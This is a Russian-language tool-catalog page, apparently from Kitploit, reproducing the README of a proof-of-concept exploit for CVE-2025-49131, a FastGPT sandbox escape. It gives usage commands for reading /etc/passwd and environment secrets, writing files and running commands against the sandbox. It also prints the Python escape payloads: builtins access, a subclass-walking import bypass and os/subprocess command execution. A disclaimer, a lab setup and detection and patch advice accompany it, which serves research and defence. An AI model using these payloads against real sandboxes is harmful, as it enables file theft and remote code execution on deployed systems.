Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-49131-poc | Kitploit
Инструменты/GitHubGitHub/wenura17125/cve-2025-49131-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеИнструмент Удаленного ДоступаПобег из Контейнера
GitHubwenura17125/cve-2025-49131-poc

cve-2025-49131-poc

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-49131 - POC обхода песочницы FastGPT

root@kitploit:~
 ███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
 ██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
 █████╗  ███████║███████╗   ██║   ██║  ███╗██████╔╝   ██║   
 ██╔══╝  ██╔══██║╚════██║   ██║   ██║   ██║██╔═══╝    ██║   
 ██║     ██║  ██║███████║   ██║   ╚██████╔╝██║        ██║   
 ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝ ╚═╝        ╚═╝   
                                                            
 ███████╗ █████╗ ███╗   ██╗██████╗ ██████╗  ██████╗ ██╗  ██╗
 ██╔════╝██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
 ███████╗███████║██╔██╗ ██║██║  ██║██████╔╝██║   ██║ ╚███╔╝ 
 ╚════██║██╔══██║██║╚██╗██║██║  ██║██╔══██╗██║   ██║ ██╔██╗ 
 ███████║██║  ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
 ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═════╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
                                                            
 ███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗           
 ██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝           
 █████╗  ███████╗██║     ███████║██████╔╝█████╗             
 ██╔══╝  ╚════██║██║     ██╔══██║██╔═══╝ ██╔══╝             
 ███████╗███████║╚██████╗██║  ██║██║     ███████╗           
 ╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝     ╚══════╝           
                                                            
        ╔═══════════════════════════════════════╗
        ║     CVE-2025-49131 | CVSS 6.3        ║
        ║   FastGPT Sandbox Container Escape   ║
        ║      Affected: < v4.9.11             ║
        ╚═══════════════════════════════════════╝

🎯 Обзор уязвимости

⚠️ Отказ от ответственности

Этот инструмент предназначен только для авторизованных исследований в области безопасности и образовательных целей.

  • Тестируйте только системы, которыми вы владеете или на тестирование которых имеете явное письменное разрешение
  • Соблюдайте практики ответственного раскрытия
  • Соблюдайте все применимые законы и нормативные требования

📖 Описание

CVE-2025-49131 — это уязвимость обхода песочницы в контейнере fastgpt-sandbox FastGPT. Уязвимость существует из-за:

  • Недостаточных механизмов изоляции — песочница не ограничивает должным образом встроенные функции Python (builtins)
  • Чрезмерно разрешительных системных вызовов — опасные syscalls не блокируются
  • Недостаточных ограничений выполнения кода — ограничения импорта могут быть обойдены

Воздействие

Успешная эксплуатация позволяет атакующему:

  • ✅ Читать произвольные файлы — доступ к /etc/passwd, конфигурационным файлам, секретам
  • ✅ Записывать произвольные файлы — изменять системные файлы, внедрять вредоносный код
  • ✅ Обходить ограничения импорта Python — импортировать модули os, subprocess
  • ✅ Потенциальный RCE — выполнять системные команды через импортированные модули

🚀 Быстрый старт

root@kitploit:~
# Clone this repository
git clone https://github.com/Wenura17125/cve-2025-49131-poc.git
cd cve-2025-49131-poc

# Install dependencies
pip install -r requirements.txt

# Run vulnerability detection
python poc.py --target http://localhost:3001 --detect

# Read a file
python poc.py --target http://localhost:3001 --read /etc/passwd

# Attempt RCE
python poc.py --target http://localhost:3001 --rce "id"

🔧 Настройка уязвимого окружения

root@kitploit:~
# Start vulnerable and patched containers
docker-compose up -d

# Vulnerable sandbox on port 3001
# Patched sandbox on port 3002

💻 Использование

Режим обнаружения (без деструктивных действий)

root@kitploit:~
python poc.py --target http://localhost:3001 --detect -v

Чтение произвольных файлов

root@kitploit:~
python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --read /proc/self/environ

Запись файлов

root@kitploit:~
python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"

Обход импорта

root@kitploit:~
python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --import subprocess

Переменные окружения

root@kitploit:~
python poc.py --target http://localhost:3001 --env

Удалённое выполнение кода

root@kitploit:~
python poc.py --target http://localhost:3001 --rce "whoami"
python poc.py --target http://localhost:3001 --rce "cat /etc/passwd"

Все параметры

root@kitploit:~
python poc.py --help

📁 Структура проекта

root@kitploit:~
cve-2025-49131-poc/
├── poc.py                # Main exploit script
├── payloads.py           # Payload generator library
├── docker-compose.yml    # Test environment
├── requirements.txt      # Python dependencies
├── README.md             # This file
└── tests/
    └── test_exploit.py   # Automated tests

🔬 Технические детали

Корневая причина уязвимости

Песочница FastGPT предназначена для выполнения пользовательского кода в изолированной среде. Однако механизмы изоляции недостаточны:

  1. Доступ к Python __builtins__ — песочница не ограничивает должным образом доступ к встроенным функциям, таким как open(), __import__() и т.д.

  2. Фильтрация системных вызовов — список разрешённых syscall включает опасные вызовы, обеспечивающие доступ к файловой системе

  3. Обход ограничений импорта — существует множество методов обхода ограничений на импорт модулей

Схема эксплуатации

root@kitploit:~
┌─────────────────────────────────────────────┐
│ 1. Send malicious code to sandbox API       │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 2. Bypass sandbox restrictions using:       │
│    - __builtins__ manipulation              │
│    - Subclass walking                       │
│    - Import bypass techniques               │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 3. Gain access to:                          │
│    - File system (read/write)               │
│    - os/subprocess modules                  │
│    - Environment variables                  │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 4. Impact:                                  │
│    - Data exfiltration                      │
│    - Code injection                         │
│    - Remote command execution               │
└─────────────────────────────────────────────┘

Примеры эксплойтов

Чтение файла:

root@kitploit:~
open('/etc/passwd', 'r').read()
__builtins__.open('/etc/passwd').read()

Обход импорта:

root@kitploit:~
__import__('os')
__builtins__.__import__('os')
[x for x in ().__class__.__base__.__subclasses__() 
 if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__'](https://github.com/wenura17125/cve-2025-49131-poc/blob/HEAD/%27os%27)

RCE:

root@kitploit:~
__import__('os').popen('id').read()
__import__('subprocess').check_output('id', shell=True)

🛡️ Обнаружение и смягчение

Обнаружение

Ищите подозрительную активность в журналах песочницы:

  • Попытки доступа к /etc/passwd, /etc/shadow
  • Вызовы __builtins__, __import__
  • Использование модулей subprocess или os
  • Необычные операции чтения/записи файлов

Смягчение

  1. Обновите FastGPT до версии 4.9.11 или новее
  2. Сетевая изоляция — ограничьте сетевой доступ контейнера песочницы
  3. Лимиты ресурсов — примените лимиты CPU/памяти к контейнерам
  4. Мониторинг — внедрите ведение журналов и оповещения для активности песочницы

📚 Ссылки

  • NVD - CVE-2025-49131
  • FastGPT GitHub
  • GitHub Security Advisory
  • FastGPT Documentation

⏱️ Хронология

ДатаСобытие
2025-??-??Уязвимость обнаружена
2025-??-??Поставщик уведомлён
2025-06-??Выпущен патч (v4.9.11)
2025-06-09Публичное раскрытие

📄 Лицензия

Этот проект предназначен только для образовательных и авторизованных исследовательских целей в области безопасности. Используйте ответственно.


Создано для исследовательских целей в области безопасности. Всегда получайте соответствующее разрешение перед тестированием.

Скачать инструмент
ПолеЗначение
Идентификатор CVECVE-2025-49131
Оценка CVSS6.3 (Средний)
Вектор CVSSAV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Тип уязвимостиОбход песочницы
Затронутое ПОFastGPT (контейнер fastgpt-sandbox)
Затронутые версии< 4.9.11
Исправленная версия4.9.11+
Дата раскрытия9 июня 2025